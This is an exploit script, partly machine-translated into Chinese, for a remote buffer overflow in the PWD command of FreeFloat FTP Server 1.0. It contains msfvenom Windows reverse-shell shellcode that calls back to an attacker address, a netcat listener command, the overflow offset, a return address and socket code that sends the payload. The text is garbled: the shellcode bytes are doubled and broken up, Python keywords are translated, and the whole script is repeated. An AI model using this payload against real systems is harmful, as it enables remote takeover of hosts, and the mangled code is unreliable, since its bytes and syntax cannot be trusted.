#Exploit title: FreeFloat FTP Server 1.0-'PWD'远程缓冲区溢出
#date: 08/22/2023
#Exploit作者: Waqas Ahmed Faroouqi(Zeroxinn)
#DENDOR HOMEPAGE: http://www.freefoat.com
#版本: 1.0
#在Windows XP SP3上进行了测试
#!/usr/bin/python
导入套接字
#metasploit shellcode
#MMSFVENOM -P Windows/shell_reverse_tcp lhost=192.168.146.134 lport=4444 -b'\ x00 \ x00 \ x0d'
#NC -LVP 4444
#send exploit
#offset=247
#badchars=\ x00 \ x0d \
#return_address=\ x3b \ x69 \ x5a \ x77(ole32.dll)
有效载荷=((
'\ xb8 \ xf3 \ x93 \ x2e \ x96 \ xdb \ xca \ xd9 \ x74 \ x74 \ x24 \ x24 \ xf4 \ xf4 \ x5b \ x31 \ x31 \ xc9''
'\ xb1 \ x52 \ x31 \ x43 \ x12 \ x83 \ xeb \ xeb \ xfc \ x03 \ xb0 \ xb0 \ x9d \ x9d \ xcc \ xcc \ x63 \ xca''
'\ x4a \ x92 \ x8c \ x32 \ x8b \ xf3 \ x05 \ xd7 \ xd7 \ xba \ x33 \ x33 \ x71 \ x71 \ x9c \ x9c \ xed \ x83''
'\ xf1 \ xf0 \ x01 \ x6f \ x57 \ xe0 \ x92 \ x92 \ x1d \ x70 \ x70 \ x07 \ x12 \ x12 \ xab \ xa6 \ x26 \ x26''
'\ xa3 \ x80 \ x9b \ x29 \ x27 \ xdb \ xdb \ xcf \ x89 \ x16 \ x16 \ x14 \ x14 \ x02 \ xc8 \ xc8 \ x5f \ x49'''
'\ xef \ x98 \ x08 \ x05 \ x42 \ x0c \ x3c \ x3c \ x53 \ x5f \ x5f \ xa7 \ x0e \ x0e \ x75 \ x75 \ xe7 \ x54'\ x54''
'\ xc6 \ x74 \ xc6 \ xcb \ x5c \ x2f \ x2f \ xc8 \ xea \ xb1 \ xb1 \ x5b \ x5b \ x41 \ x41 \ xf4 \ xd6 \ x66 \ x66'
'\ x1b \ x8f \ x2d \ x1c \ x9a \ x59 \ x7c \ xdd \ xdd \ x31 \ xa4 \ xb0 \ xb0 \ x2c \ x4b \ x4b \ xe1'
'\ x77 \ xcf \ x3e \ x1b \ x84 \ x72 \ x39 \ xd8 \ xd8 \ xf6 \ xa8 \ xcc \ xcc \ xfa \ xfa \ x51 \ x3a'''
'\ x76 \ x26 \ x63 \ xef \ xe1 \ xad \ x6f \ x44 \ x65 \ x65 \ xe9 \ x73 \ x73 \ x5b \ xaa \ x82'\ x82'
'\ x88 \ xd0 \ x4d \ x44 \ x19 \ xa2 \ x69 \ x40 \ x40 \ x41 \ x41 \ x70 \ x13 \ x13 \ xd1 \ x2f \ x2f \ xd7'''
'\ x2c \ x01 \ x90 \ x88 \ x88 \ x4a \ x4a \ x3d \ xdc \ xa0 \ xa0 \ x11 \ x2a \ x2a \ x11 \ x89 \ x89 \ xa9'''
'\ xaa \ x3d \ x9a \ xda \ x98 \ xe2 \ x30 \ x74 \ x74 \ x91 \ x6b \ x6b \ x9f \ x9f \ x83 \ xd6 \ x41 \ x41'
'\ x67 \ x1b \ x29 \ x6a \ x98 \ x32 \ xee \ x3e \ x3e \ xc8 \ xc8 \ x2c \ xc7 \ x3e \ x3e \ x83 \ x83 \ xac''
'\ Xe8 \ XEA \ X04 \ XFC \ X46 \ X45 \ XE5 \ XAC \ XAC \ X26 \ X35 \ X35 \ X8D \ X8D \ XA6 \ XA8 \ XA8 \ X6A'''
'\ xad \ xc9 \ x62 \ x03 \ x44 \ x30 \ xe5 \ xec \ xec \ x31 \ xa8 \ x73 \ x73 \ x84 \ x43 \ x43 \ xcc'
'\ x6a \ x09 \ xcd \ x2a \ xe6 \ xa1 \ Xa1 \ x9b \ xe5 \ x9f \ x9f \ x58 \ x86 \ x86 \ x7d \ x7d \ x01 \ xa4 \ xa4''
'\ x1c \ xf8 \ x01 \ x2e \ x93 \ xfd \ xfd \ xcc \ xc7 \ xde \ xde \ xed \ xb9 \ xb9 \ x27 \ x95 \ x95 \ x4f'
'\ x6f \ x37 \ x03 \ xe7 \ xf3 \ xaa \ xc8 \ xf7 \ xf7 \ x7a \ xd7 \ xd7 \ x46 \ x46 \ xa0 \ x2b \ x2b \ x29''
'\ x9f \ x24 \ xc6 \ x10 \ x09 \ x5a \ x5a \ x1b \ xc4 \ x72 \ xde \ xde \ xc0 \ xc0 \ x35 \ x35 \ x7c \ xdf'
'\ x85 \ x02 \ x5a \ xcf \ x53 \ x8a \ xe6 \ xbb \ xbb \ x0b \ xdd \ xdd \ xb0 \ x15 \ x15 \ xea \ xb7'\ xb7'''
'\ x72 \ xcf \ xa4 \ x64 \ xdd \ x87 \ x31 \ x31 \ x47 \ xde \ xde \ xd1 \ x3d \ x3d \ x82 \ xa8 \ x3d \ x3d'
'\ x8f \ x7b \ xed \ x42 \ x20 \ xec \ xf9 \ x3b \ x5c \ x5c \ x8c \ x8c \ x06 \ x96 \ x96 \ xe4 \ xac'
'\ xe4 \ x32 \ x11 \ x45 \ xb1 \ xd7 \ x98 \ x08 \ x08 \ x42 \ x42 \ x02 \ xde \ xde \ x34 \ xc1 \ xc1 \ xa6'''
'\ x9f \ xc2 \ xd9 \ xc3 \ x9a \ x8f \ x5d \ x5d \ x38 \ xd7 \ xd7 \ x80 \ x80 \ x0b \ x3e \ x3e \ x44 \ xa0'
'\ x19')
shellCode='a' * 247 +'\ x3b \ x69 \ x5a \ x77' +'\ x90' * 10 +有效载荷
def main():
ip='192.168.146.135'
端口=21
sock=socket.socket(socket.af_inet,socket.sock_stream)
sock.connect((IP,端口))
Sock.RECV(1024)
sock.send('用户匿名\ r \ n')
Sock.RECV(1024)
sock.send('通过匿名\ r \ n')
Sock.RECV(1024)
sock.send('pwd' + shellCode +'\ r \ n')
sock.close()
如果name=='__ -Main __':
主要的()
#date: 08/22/2023
#Exploit作者: Waqas Ahmed Faroouqi(Zeroxinn)
#DENDOR HOMEPAGE: http://www.freefoat.com
#版本: 1.0
#在Windows XP SP3上进行了测试
#!/usr/bin/python
导入套接字
#metasploit shellcode
#MMSFVENOM -P Windows/shell_reverse_tcp lhost=192.168.146.134 lport=4444 -b'\ x00 \ x00 \ x0d'
#NC -LVP 4444
#send exploit
#offset=247
#badchars=\ x00 \ x0d \
#return_address=\ x3b \ x69 \ x5a \ x77(ole32.dll)
有效载荷=((
'\ xb8 \ xf3 \ x93 \ x2e \ x96 \ xdb \ xca \ xd9 \ x74 \ x74 \ x24 \ x24 \ xf4 \ xf4 \ x5b \ x31 \ x31 \ xc9''
'\ xb1 \ x52 \ x31 \ x43 \ x12 \ x83 \ xeb \ xeb \ xfc \ x03 \ xb0 \ xb0 \ x9d \ x9d \ xcc \ xcc \ x63 \ xca''
'\ x4a \ x92 \ x8c \ x32 \ x8b \ xf3 \ x05 \ xd7 \ xd7 \ xba \ x33 \ x33 \ x71 \ x71 \ x9c \ x9c \ xed \ x83''
'\ xf1 \ xf0 \ x01 \ x6f \ x57 \ xe0 \ x92 \ x92 \ x1d \ x70 \ x70 \ x07 \ x12 \ x12 \ xab \ xa6 \ x26 \ x26''
'\ xa3 \ x80 \ x9b \ x29 \ x27 \ xdb \ xdb \ xcf \ x89 \ x16 \ x16 \ x14 \ x14 \ x02 \ xc8 \ xc8 \ x5f \ x49'''
'\ xef \ x98 \ x08 \ x05 \ x42 \ x0c \ x3c \ x3c \ x53 \ x5f \ x5f \ xa7 \ x0e \ x0e \ x75 \ x75 \ xe7 \ x54'\ x54''
'\ xc6 \ x74 \ xc6 \ xcb \ x5c \ x2f \ x2f \ xc8 \ xea \ xb1 \ xb1 \ x5b \ x5b \ x41 \ x41 \ xf4 \ xd6 \ x66 \ x66'
'\ x1b \ x8f \ x2d \ x1c \ x9a \ x59 \ x7c \ xdd \ xdd \ x31 \ xa4 \ xb0 \ xb0 \ x2c \ x4b \ x4b \ xe1'
'\ x77 \ xcf \ x3e \ x1b \ x84 \ x72 \ x39 \ xd8 \ xd8 \ xf6 \ xa8 \ xcc \ xcc \ xfa \ xfa \ x51 \ x3a'''
'\ x76 \ x26 \ x63 \ xef \ xe1 \ xad \ x6f \ x44 \ x65 \ x65 \ xe9 \ x73 \ x73 \ x5b \ xaa \ x82'\ x82'
'\ x88 \ xd0 \ x4d \ x44 \ x19 \ xa2 \ x69 \ x40 \ x40 \ x41 \ x41 \ x70 \ x13 \ x13 \ xd1 \ x2f \ x2f \ xd7'''
'\ x2c \ x01 \ x90 \ x88 \ x88 \ x4a \ x4a \ x3d \ xdc \ xa0 \ xa0 \ x11 \ x2a \ x2a \ x11 \ x89 \ x89 \ xa9'''
'\ xaa \ x3d \ x9a \ xda \ x98 \ xe2 \ x30 \ x74 \ x74 \ x91 \ x6b \ x6b \ x9f \ x9f \ x83 \ xd6 \ x41 \ x41'
'\ x67 \ x1b \ x29 \ x6a \ x98 \ x32 \ xee \ x3e \ x3e \ xc8 \ xc8 \ x2c \ xc7 \ x3e \ x3e \ x83 \ x83 \ xac''
'\ Xe8 \ XEA \ X04 \ XFC \ X46 \ X45 \ XE5 \ XAC \ XAC \ X26 \ X35 \ X35 \ X8D \ X8D \ XA6 \ XA8 \ XA8 \ X6A'''
'\ xad \ xc9 \ x62 \ x03 \ x44 \ x30 \ xe5 \ xec \ xec \ x31 \ xa8 \ x73 \ x73 \ x84 \ x43 \ x43 \ xcc'
'\ x6a \ x09 \ xcd \ x2a \ xe6 \ xa1 \ Xa1 \ x9b \ xe5 \ x9f \ x9f \ x58 \ x86 \ x86 \ x7d \ x7d \ x01 \ xa4 \ xa4''
'\ x1c \ xf8 \ x01 \ x2e \ x93 \ xfd \ xfd \ xcc \ xc7 \ xde \ xde \ xed \ xb9 \ xb9 \ x27 \ x95 \ x95 \ x4f'
'\ x6f \ x37 \ x03 \ xe7 \ xf3 \ xaa \ xc8 \ xf7 \ xf7 \ x7a \ xd7 \ xd7 \ x46 \ x46 \ xa0 \ x2b \ x2b \ x29''
'\ x9f \ x24 \ xc6 \ x10 \ x09 \ x5a \ x5a \ x1b \ xc4 \ x72 \ xde \ xde \ xc0 \ xc0 \ x35 \ x35 \ x7c \ xdf'
'\ x85 \ x02 \ x5a \ xcf \ x53 \ x8a \ xe6 \ xbb \ xbb \ x0b \ xdd \ xdd \ xb0 \ x15 \ x15 \ xea \ xb7'\ xb7'''
'\ x72 \ xcf \ xa4 \ x64 \ xdd \ x87 \ x31 \ x31 \ x47 \ xde \ xde \ xd1 \ x3d \ x3d \ x82 \ xa8 \ x3d \ x3d'
'\ x8f \ x7b \ xed \ x42 \ x20 \ xec \ xf9 \ x3b \ x5c \ x5c \ x8c \ x8c \ x06 \ x96 \ x96 \ xe4 \ xac'
'\ xe4 \ x32 \ x11 \ x45 \ xb1 \ xd7 \ x98 \ x08 \ x08 \ x42 \ x42 \ x02 \ xde \ xde \ x34 \ xc1 \ xc1 \ xa6'''
'\ x9f \ xc2 \ xd9 \ xc3 \ x9a \ x8f \ x5d \ x5d \ x38 \ xd7 \ xd7 \ x80 \ x80 \ x0b \ x3e \ x3e \ x44 \ xa0'
'\ x19')
shellCode='a' * 247 +'\ x3b \ x69 \ x5a \ x77' +'\ x90' * 10 +有效载荷
def main():
ip='192.168.146.135'
端口=21
sock=socket.socket(socket.af_inet,socket.sock_stream)
sock.connect((IP,端口))
Sock.RECV(1024)
sock.send('用户匿名\ r \ n')
Sock.RECV(1024)
sock.send('通过匿名\ r \ n')
Sock.RECV(1024)
sock.send('pwd' + shellCode +'\ r \ n')
sock.close()
如果name=='__ -Main __':
主要的()